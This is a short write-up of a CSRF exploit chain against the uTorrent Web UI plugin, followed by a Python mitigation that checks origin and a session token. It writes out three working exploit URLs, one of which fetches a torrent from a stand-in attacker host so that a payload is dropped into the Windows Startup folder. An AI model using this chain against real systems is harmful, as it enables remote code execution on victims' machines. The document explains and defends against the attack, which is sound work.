Rob Carter has posted a blog entry on how to pwn a box via a pure CSRF bug in a uTorrent plugin. When a user installs the uTorrent Web UI plugin, the plugin starts a locally running web server on the user's machine. Basically, his CSRF exploit forces uTorrent to move completed downloads to an arbitrary directory on the victim's system and to download arbitrary torrents, which lets the attacker completely own the box.

  • The first CSRF turns on the “Move completed downloads” option in the uTorrent Web UI. http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=1

  • The second CSRF changes the path where completed torrent downloads are placed. For example: http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup

  • The last CSRF forces the victim to download a torrent that points to an attacker-controlled file. Once the file is downloaded via the torrent, uTorrent places it in the Startup folder, and it runs automatically at the next Windows boot. http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
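All three requests succeed because the Web UI changes state on a plain GET that any page in the victim's browser can trigger. The following is an added mitigation sketch, not code from the blog post or from uTorrent: it gates the `setsetting` and `add-url` actions behind a same-origin check and a per-session secret. The `token` parameter name, the session value and the request headers are assumptions constructed for the example.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

# Actions named on this page that change state; a real UI would list all of them.
STATE_CHANGING = {"setsetting", "add-url"}
TRUSTED_ORIGIN = "http://localhost:14774"  # Web UI origin used in the page's URLs


def origin_of(headers):
    """Return scheme://host[:port] from Origin, falling back to Referer."""
    value = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None  # header missing, or an opaque origin such as "null"
    return f"{parts.scheme}://{parts.netloc}"


def check_request(url, headers, session_token):
    """Return (allowed, reason) for one request to the local Web UI."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    action = (query.get("action") or [""])[0]
    if action not in STATE_CHANGING:
        return True, "read-only"
    # A forged cross-site request carries the other page's origin, or none.
    if origin_of(headers) != TRUSTED_ORIGIN:
        return False, "cross-origin"
    # "token" is a hypothetical parameter: a per-session secret that a
    # third-party page cannot read and so cannot place in the URL.
    supplied = (query.get("token") or [""])[0]
    if not hmac.compare_digest(supplied.encode(), session_token.encode()):
        return False, "bad-token"
    return True, "ok"


BASE = "http://localhost:14774/gui/?action="
SESSION = "k3Jq-constructed-session-token"  # constructed sample value
SAMPLES = [  # constructed requests; URLs 1 and 2 are the ones quoted on this page
    (BASE + "setsetting&s=dir_completed_download_flag&v=1",
     {"Referer": "http://www.attacker.com/page.html"}),
    (BASE + "add-url&s=http://www.attacker.com/file.torrent", {}),
    (BASE + "setsetting&s=dir_completed_download_flag&v=1",
     {"Origin": TRUSTED_ORIGIN}),
    (BASE + "setsetting&s=dir_completed_download_flag&v=1&token=" + SESSION,
     {"Referer": TRUSTED_ORIGIN + "/gui/"}),
]


def run_samples():
    """Evaluate every constructed sample and return the list of reasons."""
    return [check_request(url, hdrs, SESSION)[1] for url, hdrs in SAMPLES]
```

The origin check alone is not sufficient when other software shares the same origin, which is why the secret token is checked as well.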